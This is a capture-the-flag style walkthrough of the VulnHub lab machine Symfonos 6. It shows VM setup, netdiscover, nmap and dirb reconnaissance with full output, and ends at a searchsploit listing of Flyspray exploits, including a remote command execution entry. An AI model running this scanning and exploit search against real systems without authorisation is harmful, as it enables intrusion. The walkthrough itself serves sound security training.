Symfonos 6 || VulnHub Walkthrough

Inside this Article:

Settings Up
Enumeration

Identify the IP address
Mapping the Network
Web Enumeration
Web Directory Enumeration
Inspecting the FlySpray web Dashboard

Exploitation

Looking for Potential Vulnerabilities
Exploiting FlySpray (Manually)

Foothold

Access Via SSH
Enumerate Gitea
Exploiting Gitea service (Manually)
Enumerate the Session

Privilege Escalation

Enumerate System Information
Escalate to user, Achilles
Privilege Escalation via Misconfigured Sudo Permissions on Go Binary

Hello, everyone! Welcome back to our VulnHub Walkthrough series. In today’s video, we’ll continue exploring the exciting VulnHub collection with "SymfonOS." Specifically, we’re diving into the 6^thand our last virtual machine in the series, " SymfonOS 6 ." This intermediate, OSCP-like, real-world scenario machine is designed to highlight the importance of understanding vulnerabilities and how to exploit them effectively.

Let’s get started!

To begin, head over to the VulnHub website and download the machine's image file. If you're new to VulnHub, check out our playlist for helpful guides on how to use the platform.

Vulhub - Vulnerable by Design

Discover Vulhub, a collection of pre-built Docker environments for security testing. This platform offers a wide range of vulnerable systems to help enhance penetration testing and security assessment skills.

Now, let’s get started with exploiting this machine!

Settings Up

Previously, we downloaded all the 6 image files.

So, our next step is, to set up the Virtual image in VirtualBox. The downloaded image file is in the form of 7Z format, so start by extracting the archive to access the files within. You’ll find several files, including the essential VMDK files, in the extracted folder.

Now, our next step involves “ creating a new virtual machine ”.

Creating a New VM

In VirtualBox, click "New" to create a new VM.

Name it " SymfonOS 6 ," set the OS type to Linux, and choose " Other Linux 64-bit " for the version since the specific distribution is unknown.

Now, allocate the desired amount of RAM .

Next, select " Use an existing virtual hard disk file " locate the VMDK file, and click on " Finish " to complete the setup.

Once the setup is finished, you'll see the " SymfonOS 6 " vulnerable machine in the VirtualBox manager . For better organization, let me regroup it into the VulnHub group.

Network Configuration

To ensure that both your Kali Linux machine (used for attacks) and the vulnerable machine are connected to the same network, do we have to make sure they're both connected via a host-only Adapter ?

So, go to “ settings ” and change the Network adapter to " Host-Only ."

Since everything is ready, let’s attempt to start the VM to check if it works.

Start the VMs

Once it's ready, you should see a login prompt , indicating that everything is set up and we can begin our exploration!

Finally, notice that our vulnerable machine is ready, with a login prompt awaiting. Let's dive into the fun!

Enumeration

Identify the IP address

The first step in our attack is enumeration, where we identify the IP address of our target machine using the netdiscover tool. This step helps map the network and locate devices that are up and accessible.

To execute this, open a terminal and enter: netdiscover –i <specify Network Interface name> , which in this case is eth1 .

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1

The command output displays a list of devices detected on the network, showing their IP and MAC addresses, as well as the associated vendor.

 Currently scanning: 192.168.108.0/16   |   Screen View: Unique Hosts                                                                                    
                                                                                                                                                         
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                         
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.103.1   0a:00:27:00:00:14      1      60  Unknown vendor                                                                                        
 192.168.103.2   08:00:27:b8:5c:2b      1      60  PCS Systemtechnik GmbH                                                                                

 192.168.103.18  08:00:27:39:ab:68      1      60  PCS Systemtechnik GmbH           

From these results, we can see several IP addresses along with their corresponding MAC addresses. Our target machine’s IP address is identified as “ 192.168.103.18” .

Mapping the Network

Next, we'll perform a network scan to identify open ports on the target, which is a critical part of the enumeration process. Identifying open ports provides insights into the network’s attack surface, helping us pinpoint services that may be vulnerable to exploitation. For this task, we’ll use the popular network scanning tool, Nmap.

To execute the scan, open a terminal and run the command:

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.103.18

In this command:

-sC : Performs a script scan using Nmap's default scripts to gather additional information about services and identify potential vulnerabilities.
-sV : Enables version detection to determine the versions of services running on open ports.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 13:17 EST

Nmap scan report for 192.168.103.18

Host is up (0.00047s latency).

Not shown: 995 closed tcp ports (conn-refused)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.4 (protocol 2.0)

| ssh-hostkey:

| 2048 0e:ad:33:fc:1a:1e:85:54:64:13:39:14:68:09:c1:70 (RSA)

| 256 54:03:9b:48:55:de:b3:2b:0a:78:90:4a:b3:1f:fa:cd (ECDSA)

|_ 256 4e:0c:e6:3d:5c:08:09:f4:11:48:85:a2:e7:fb:8f:b7 (ED25519)

80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)

|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40

| http-methods:

|_ Potentially risky methods: TRACE

3000/tcp open ppp?

| fingerprint-strings:

| GenericLines, Help:

| HTTP/1.1 400 Bad Request

| Content-Type: text/plain; charset=utf-8

| Connection: close

| Request

| GetRequest:

| HTTP/1.0 200 OK

| Content-Type: text/html; charset=UTF-8

| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647

| Set-Cookie: i_like_gitea=49fd5825fad5aa8d; Path=/; HttpOnly

| Set-Cookie: _csrf=Pk916asD1Xz4WaGVF4mpyjccdr06MTczMzA3NzAzNDk2ODc3OTI3NA; Path=/; Expires=Mon, 02 Dec 2024 18:17:14 GMT; HttpOnly

| X-Frame-Options: SAMEORIGIN

| Date: Sun, 01 Dec 2024 18:17:15 GMT

| <!DOCTYPE html>

| <html lang="en-US">

| <head data-suburl="">

| <meta charset="utf-8">

| <meta name="viewport" content="width=device-width, initial-scale=1">

| <meta http-equiv="x-ua-compatible" content="ie=edge">

| <title> Symfonos6</title>

| <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">

| <script>

| ('serviceWorker' in navigator) {

| navigator.serviceWorker.register('/serviceworker.js').then(function(registration) {

| console.info('ServiceWorker registration successful with scope: ', registrat

| HTTPOptions:

| HTTP/1.0 404 Not Found

| Content-Type: text/html; charset=UTF-8

| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647

| Set-Cookie: i_like_gitea=82b3bbaff5fa3556; Path=/; HttpOnly

| Set-Cookie: _csrf=aoXQJDIzGFtpa492o1ciqnAr6Lo6MTczMzA3NzA0MDE3MTgxMzQ2OA; Path=/; Expires=Mon, 02 Dec 2024 18:17:20 GMT; HttpOnly

| X-Frame-Options: SAMEORIGIN

| Date: Sun, 01 Dec 2024 18:17:20 GMT

| <!DOCTYPE html>

| <html lang="en-US">

| <head data-suburl="">

| <meta charset="utf-8">

| <meta name="viewport" content="width=device-width, initial-scale=1">

| <meta http-equiv="x-ua-compatible" content="ie=edge">

| <title>Page Not Found - Symfonos6</title>

| <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">

| <script>

| ('serviceWorker' in navigator) {

| navigator.serviceWorker.register('/serviceworker.js').then(function(registration) {

|_ console.info('ServiceWorker registration successful

3306/tcp open mysql MariaDB (unauthorized)

5000/tcp open upnp?

| fingerprint-strings:

| FourOhFourRequest:

| HTTP/1.0 404 Not Found

| Content-Type: text/plain

| Date: Sun, 01 Dec 2024 18:17:44 GMT

| Content-Length: 18

| page not found

| GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:

| HTTP/1.1 400 Bad Request

| Content-Type: text/plain; charset=utf-8

| Connection: close

| Request

| GetRequest:

| HTTP/1.0 404 Not Found

| Content-Type: text/plain

| Date: Sun, 01 Dec 2024 18:17:14 GMT

| Content-Length: 18

| page not found

| HTTPOptions:

| HTTP/1.0 404 Not Found

| Content-Type: text/plain

| Date: Sun, 01 Dec 2024 18:17:29 GMT

| Content-Length: 18

|_ page not found

2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :

==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============

SF-Port3000-TCP:V=7.94SVN%I=7%D=12/1%Time=674CA82B%P=x86_64-pc-linux-gnu%r

SF:(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x

SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba

SF:d\x20Request")%r(GetRequest,1000,"HTTP/1\.0\x20200\x20OK\r\nContent-Typ

SF:e:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path

SF:=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=49fd5825fad5aa

SF:8d;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=Pk916asD1Xz4WaGVF4mp

SF:yjccdr06MTczMzA3NzAzNDk2ODc3OTI3NA;\x20Path=/;\x20Expires=Mon,\x2002\x2

SF:0Dec\x202024\x2018:17:14\x20GMT;\x20HttpOnly\r\nX-Frame-Options:\x20SAM

SF:EORIGIN\r\nDate:\x20Sun,\x2001\x20Dec\x202024\x2018:17:15\x20GMT\r\n\r\

SF:n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\">\n<head\x20data-suburl=\"\

SF:">\n\t<meta\x20charset=\"utf-8\">\n\t<meta\x20name=\"viewport\"\x20cont

SF:ent=\"width=device-width,\x20initial-scale=1\">\n\t<meta\x20http-equiv=

SF:\"x-ua-compatible\"\x20content=\"ie=edge\">\n\t<title>\x20Symfonos6</ti

SF:tle>\n\t<link\x20rel=\"manifest\"\x20href=\"/manifest\.json\"\x20crosso

SF:rigin=\"use-credentials\">\n\t\n\t<script>\n\t\tif\x20\('serviceWorker'

SF:\x20in\x20navigator\)\x20{\n\t\t\tnavigator\.serviceWorker\.register\('

SF:/serviceworker\.js'\)\.then$function\(registration$\x20{\n\t\t\t\t\n\

SF:t\t\t\tconsole\.info\('ServiceWorker\x20registration\x20successful\x20w

SF:ith\x20scope:\x20',\x20registrat")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x

SF:20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnectio

SF:n:\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,216B,"HTTP/1\.

SF:0\x20404\x20Not\x20Found\r\nContent-Type:\x20text/html;\x20charset=UTF-

SF:8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/;\x20Max-Age=2147483647\r\nSet

SF:-Cookie:\x20i_like_gitea=82b3bbaff5fa3556;\x20Path=/;\x20HttpOnly\r\nSe

SF:t-Cookie:\x20_csrf=aoXQJDIzGFtpa492o1ciqnAr6Lo6MTczMzA3NzA0MDE3MTgxMzQ2

SF:OA;\x20Path=/;\x20Expires=Mon,\x2002\x20Dec\x202024\x2018:17:20\x20GMT;

SF:\x20HttpOnly\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Sun,\x2001\x

SF:20Dec\x202024\x2018:17:20\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20la

SF:ng=\"en-US\">\n<head\x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-8\"

SF:>\n\t<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20ini

SF:tial-scale=1\">\n\t<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\

SF:"ie=edge\">\n\t<title>Page\x20Not\x20Found\x20-\x20\x20Symfonos6</title

SF:>\n\t<link\x20rel=\"manifest\"\x20href=\"/manifest\.json\"\x20crossorig

SF:in=\"use-credentials\">\n\t\n\t<script>\n\t\tif\x20\('serviceWorker'\x2

SF:0in\x20navigator\)\x20{\n\t\t\tnavigator\.serviceWorker\.register\('/se

SF:rviceworker\.js'\)\.then$function\(registration$\x20{\n\t\t\t\t\n\t\t

SF:\t\tconsole\.info\('ServiceWorker\x20registration\x20successful\x20");

==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============

SF-Port5000-TCP:V=7.94SVN%I=7%D=12/1%Time=674CA82B%P=x86_64-pc-linux-gnu%r

SF:(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x

SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba

SF:d\x20Request")%r(GetRequest,7F,"HTTP/1\.0\x20404\x20Not\x20Found\r\nCon

SF:tent-Type:\x20text/plain\r\nDate:\x20Sun,\x2001\x20Dec\x202024\x2018:17

SF::14\x20GMT\r\nContent-Length:\x2018\r\n\r\n404\x20page\x20not\x20found"

SF:)%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:

SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20

SF:Bad\x20Request")%r(HTTPOptions,7F,"HTTP/1\.0\x20404\x20Not\x20Found\r\n

SF:Content-Type:\x20text/plain\r\nDate:\x20Sun,\x2001\x20Dec\x202024\x2018

SF::17:29\x20GMT\r\nContent-Length:\x2018\r\n\r\n404\x20page\x20not\x20fou

SF:nd")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20

SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\

SF:x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n

SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r

SF:\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x204

SF:00\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r

SF:\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,6

SF:7,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x

SF:20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%

SF:r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t

SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x

SF:20Request")%r(FourOhFourRequest,7F,"HTTP/1\.0\x20404\x20Not\x20Found\r\

SF:nContent-Type:\x20text/plain\r\nDate:\x20Sun,\x2001\x20Dec\x202024\x201

SF:8:17:44\x20GMT\r\nContent-Length:\x2018\r\n\r\n404\x20page\x20not\x20fo

SF:und")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Typ

SF:e:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x

SF:20Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Reque

SF:st\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20c

SF:lose\r\n\r\n400\x20Bad\x20Request");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 95.14 seconds

┌──(kali㉿kali)-[~]

└─$

After the scan is completed, the results reveal four open ports with their respective services:

Port 22 (TCP): Running SSH (Secure Shell), which allows remote access with valid credentials. Although generally secure, weak or default passwords could make it vulnerable.
Port 80 (TCP): Running HTTP on a web server. The scan shows a basic website with no title hosted on Apache HTTPD, which may contain web-based vulnerabilities.
Port 3000 (TCP) : Running a service resembling Gitea, a self-hosted Git service. Potential vulnerabilities include weak or default credentials, unpatched security flaws in outdated versions, or exposed sensitive APIs.
Port 3306 (TCP) : Running MariaDB, a database service. Unauthorized access is disabled, but vulnerabilities may include brute-force attacks on credentials, outdated software versions, or misconfigured permissions.
Port 5000 (TCP) : Hosting a minimal web service that returns HTTP errors such as "404 Not Found." Potential risks include exposed endpoints , misconfigurations , or exploitable vulnerabilities in web service logic.

These open ports may present potential entry points into the target system. The next step is to conduct a deeper enumeration of each service to uncover vulnerabilities or clues that could facilitate initial access or shell exploitation. This analysis will guide the development of a strategic approach to compromise the target.

Web Enumeration

Our next steps focus on identifying vulnerabilities to gain shell access or another foothold on the target system. The HTTP web server, running on Port 80, will be our starting point, as web services are often key entry points and can uncover additional attack vectors.

Begin by accessing the web service by entering the target's IP address into a web browser.

The displayed webpage features an image depicting a Greek mythology scene, likely referencing the Trojan War or a similar legendary battle .

Inspecting the page source using CTRL + U does not reveal any hidden information.

Web Directory Enumeration

To discover hidden resources, we will perform directory enumeration using tools like dirb or Gobuster , which scan for accessible directories or files not immediately visible in the web interface.

These tools systematically scan for common directories and file names that may not be directly visible on the website, potentially revealing sensitive files or directories that could aid in further exploitation.

Execute the appropriate commands in the terminal to initiate the enumeration process.

┌──(kali㉿kali)-[~]

└─$ dirb http://192.168.103.18/

-----------------

DIRB v2.22

By The Dark Raver

-----------------

START_TIME: Sun Dec 1 13:21:48 2024

URL_BASE: http://192.168.103.18/

WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.103.18/ ----

+ http://192.168.103.18/cgi-bin/ (CODE:403|SIZE:210)

==> DIRECTORY: http://192.168.103.18/flyspray/

+ http://192.168.103.18/index.html (CODE:200|SIZE:251)

==> DIRECTORY: http://192.168.103.18/posts/

---- Entering directory: http://192.168.103.18/flyspray/ ----

+ http://192.168.103.18/flyspray/attachments (CODE:403|SIZE:222)

==> DIRECTORY: http://192.168.103.18/flyspray/avatars/

==> DIRECTORY: http://192.168.103.18/flyspray/cache/

==> DIRECTORY: http://192.168.103.18/flyspray/docs/

+ http://192.168.103.18/flyspray/favicon.ico (CODE:200|SIZE:894)

==> DIRECTORY: http://192.168.103.18/flyspray/fonts/

+ http://192.168.103.18/flyspray/includes (CODE:403|SIZE:219)

+ http://192.168.103.18/flyspray/index.php (CODE:200|SIZE:25824)

==> DIRECTORY: http://192.168.103.18/flyspray/js/

==> DIRECTORY: http://192.168.103.18/flyspray/lang/

==> DIRECTORY: http://192.168.103.18/flyspray/plugins/

+ http://192.168.103.18/flyspray/robots.txt (CODE:200|SIZE:34)

==> DIRECTORY: http://192.168.103.18/flyspray/scripts/

==> DIRECTORY: http://192.168.103.18/flyspray/themes/

==> DIRECTORY: http://192.168.103.18/flyspray/vendor/

---- Entering directory: http://192.168.103.18/posts/ ----

==> DIRECTORY: http://192.168.103.18/posts/css/

==> DIRECTORY: http://192.168.103.18/posts/includes/

+ http://192.168.103.18/posts/index.php (CODE:500|SIZE:943)

---- Entering directory: http://192.168.103.18/flyspray/avatars/ ----

+ http://192.168.103.18/flyspray/avatars/index.html (CODE:200|SIZE:1)

---- Entering directory: http://192.168.103.18/flyspray/cache/ ----

+ http://192.168.103.18/flyspray/cache/index.html (CODE:200|SIZE:0)

---- Entering directory: http://192.168.103.18/flyspray/docs/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.103.18/flyspray/fonts/ ----

+ http://192.168.103.18/flyspray/fonts/index.html (CODE:200|SIZE:1)

---- Entering directory: http://192.168.103.18/flyspray/js/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.103.18/flyspray/lang/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.103.18/flyspray/plugins/ ----

+ http://192.168.103.18/flyspray/plugins/admin.php (CODE:403|SIZE:228)

==> DIRECTORY: http://192.168.103.18/flyspray/plugins/dokuwiki/

+ http://192.168.103.18/flyspray/plugins/index.php (CODE:403|SIZE:228)

+ http://192.168.103.18/flyspray/plugins/info.php (CODE:403|SIZE:227)

+ http://192.168.103.18/flyspray/plugins/phpinfo.php (CODE:403|SIZE:230)

+ http://192.168.103.18/flyspray/plugins/xmlrpc.php (CODE:403|SIZE:229)

+ http://192.168.103.18/flyspray/plugins/xmlrpc_server.php (CODE:403|SIZE:236)

---- Entering directory: http://192.168.103.18/flyspray/scripts/ ----

+ http://192.168.103.18/flyspray/scripts/admin.php (CODE:200|SIZE:33)

+ http://192.168.103.18/flyspray/scripts/index.php (CODE:200|SIZE:33)

---- Entering directory: http://192.168.103.18/flyspray/themes/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.103.18/flyspray/vendor/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.103.18/posts/css/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.103.18/posts/includes/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.103.18/flyspray/plugins/dokuwiki/ ----

+ http://192.168.103.18/flyspray/plugins/dokuwiki/admin.php (CODE:403|SIZE:237)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/conf (CODE:403|SIZE:232)

==> DIRECTORY: http://192.168.103.18/flyspray/plugins/dokuwiki/img/

==> DIRECTORY: http://192.168.103.18/flyspray/plugins/dokuwiki/inc/

+ http://192.168.103.18/flyspray/plugins/dokuwiki/index.php (CODE:403|SIZE:237)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/info.php (CODE:403|SIZE:236)

==> DIRECTORY: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/

+ http://192.168.103.18/flyspray/plugins/dokuwiki/phpinfo.php (CODE:403|SIZE:239)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/xmlrpc.php (CODE:403|SIZE:238)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/xmlrpc_server.php (CODE:403|SIZE:245)

---- Entering directory: http://192.168.103.18/flyspray/plugins/dokuwiki/img/ ----

+ http://192.168.103.18/flyspray/plugins/dokuwiki/img/admin.php (CODE:403|SIZE:241)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/img/index.php (CODE:403|SIZE:241)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/img/info.php (CODE:403|SIZE:240)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/img/phpinfo.php (CODE:403|SIZE:243)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/img/xmlrpc.php (CODE:403|SIZE:242)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/img/xmlrpc_server.php (CODE:403|SIZE:249)

---- Entering directory: http://192.168.103.18/flyspray/plugins/dokuwiki/inc/ ----

+ http://192.168.103.18/flyspray/plugins/dokuwiki/inc/admin.php (CODE:403|SIZE:241)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/inc/index.php (CODE:403|SIZE:241)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/inc/info.php (CODE:403|SIZE:240)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/inc/phpinfo.php (CODE:403|SIZE:243)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/inc/xmlrpc.php (CODE:403|SIZE:242)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/inc/xmlrpc_server.php (CODE:403|SIZE:249)

---- Entering directory: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/ ----

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/admin.php (CODE:403|SIZE:241)

==> DIRECTORY: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/exe/

==> DIRECTORY: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/index.php (CODE:403|SIZE:241)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/info.php (CODE:403|SIZE:240)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/phpinfo.php (CODE:403|SIZE:243)

==> DIRECTORY: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/plugins/

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/xmlrpc.php (CODE:403|SIZE:242)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/xmlrpc_server.php (CODE:403|SIZE:249)

---- Entering directory: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/exe/ ----

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/exe/admin.php (CODE:403|SIZE:245)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/exe/index.php (CODE:403|SIZE:245)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/exe/info.php (CODE:403|SIZE:244)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/exe/phpinfo.php (CODE:403|SIZE:247)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/exe/xmlrpc.php (CODE:403|SIZE:246)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/exe/xmlrpc_server.php (CODE:403|SIZE:253)

---- Entering directory: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/ ----

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/admin.php (CODE:403|SIZE:248)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/index.php (CODE:403|SIZE:248)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/info.php (CODE:403|SIZE:247)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/phpinfo.php (CODE:403|SIZE:250)

==> DIRECTORY: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/smileys/

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/xmlrpc.php (CODE:403|SIZE:249)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/xmlrpc_server.php (CODE:403|SIZE:256)

---- Entering directory: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/plugins/ ----

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/plugins/admin.php (CODE:403|SIZE:249)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/plugins/index.php (CODE:403|SIZE:249)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/plugins/info.php (CODE:403|SIZE:248)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/plugins/phpinfo.php (CODE:403|SIZE:251)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/plugins/xmlrpc.php (CODE:403|SIZE:250)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/plugins/xmlrpc_server.php (CODE:403|SIZE:257)

---- Entering directory: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/smileys/ ----

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/smileys/admin.php (CODE:403|SIZE:256)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/smileys/index.php (CODE:403|SIZE:256)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/smileys/info.php (CODE:403|SIZE:255)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/smileys/phpinfo.php (CODE:403|SIZE:258)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/smileys/xmlrpc.php (CODE:403|SIZE:257)

+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/smileys/xmlrpc_server.php (CODE:403|SIZE:264)

/zt

-----------------

END_TIME: Sun Dec 1 13:22:42 2024

DOWNLOADED: 73792 - FOUND: 68

┌──(kali㉿kali)-[~]

└─$

The results of directory enumeration typically highlight potentially sensitive or hidden files and directories on the web server. Each file or directory's HTTP response code and status provide critical insights into access restrictions and potential security risks.

The index.html file , with a 200 OK status, confirms it is accessible and serves as the homepage—already viewed in our initial browser access.
Directories like flyspray/ and posts/ , returning 301 Moved Permanently , suggest redirections to other locations. These might lead to hidden web applications, management interfaces, or repositories, warranting further exploration.

To gather more information, let’s explore these paths in a browser.

Visiting the /posts webpage reveals a custom blog featuring the following description:

“ The warrior Achilles is one of the great heroes of Greek mythology. According to legend, Achilles was extraordinarily strong, courageous, and loyal, but he had one vulnerability Achilles heel. Homer's epic poem The Iliad tells the story of his adventures during the last year of the Trojan War. ”

At first glance, this content does not provide direct clues. However, when compared to the homepage, it appears to be a textual description of the image displayed there. This connection may hold significance, so further analysis of the content and its context is recommended.

Inspecting the FlySpray web Dashboard

Now, let’s inspect the flyspray/ webpage.

Upon visiting, it is identified as the web interface of Flyspray, a task-tracking system .

Flyspray - Bug Tracking System

Flyspray is an open-source bug tracking system designed for simplicity and ease of use. It provides an efficient way to manage project issues and collaborate with team members effectively.

The presence of Flyspray often suggests a potential avenue for exploitation, as outdated versions may have known vulnerabilities.

Before diving deeper, we need to enumerate the Flyspray interface for useful details.

In below, the webpage displays three main tabs:

Task List
Overview
Roadmap

This Task list tab shows a single task with the following details:

Category: Backend / Core.
Task Type: Bug Report.
Priority and Severity: Very Low.
Summary: Bug report.
Status: New

Clicking on the task provides additional details, which could be useful.

In the comment section below, there is a comment posted by "Mr. Super User" , which might provide further clues.

About the other 2 tabs:

In the overview , This tab shows general information about the system, including a summary of Symfonos bugs , with two open tasks listed.

The Roadmap section appears empty, showing no information about future plans or tasks.

Also, there is a Login button visible in the top-right corner, indicating the possibility of accessing administrative or advanced features.

Clicking on it opens a login form requiring a username and password, along with an option to register a new account.

At the bottom-right corner of the interface, the text "Powered by Flyspray" is displayed.

This information is crucial for fingerprinting the exact version of Flyspray, which can help identify any known vulnerabilities associated with the software.

Exploitation

Looking for Potential Vulnerabilities

Although the specific version of Flyspray is not directly exposed on the interface, a quick search on ExploitDB reveals potential vulnerabilities. Using the command:

┌──(kali㉿kali)-[~]
└─$ searchsploit flyspray               
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                          |  Path
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Flyspray 0.9 - Multiple Cross-Site Scripting Vulnerabilities                                                            | php/webapps/26400.txt
FlySpray 0.9.7 - 'install-0.9.7.php' Remote Command Execution                                                           | php/webapps/1494.php
Flyspray 0.9.9 - Information Disclosure/HTML Injection / Cross-Site Scripting                                           | php/webapps/31326.txt
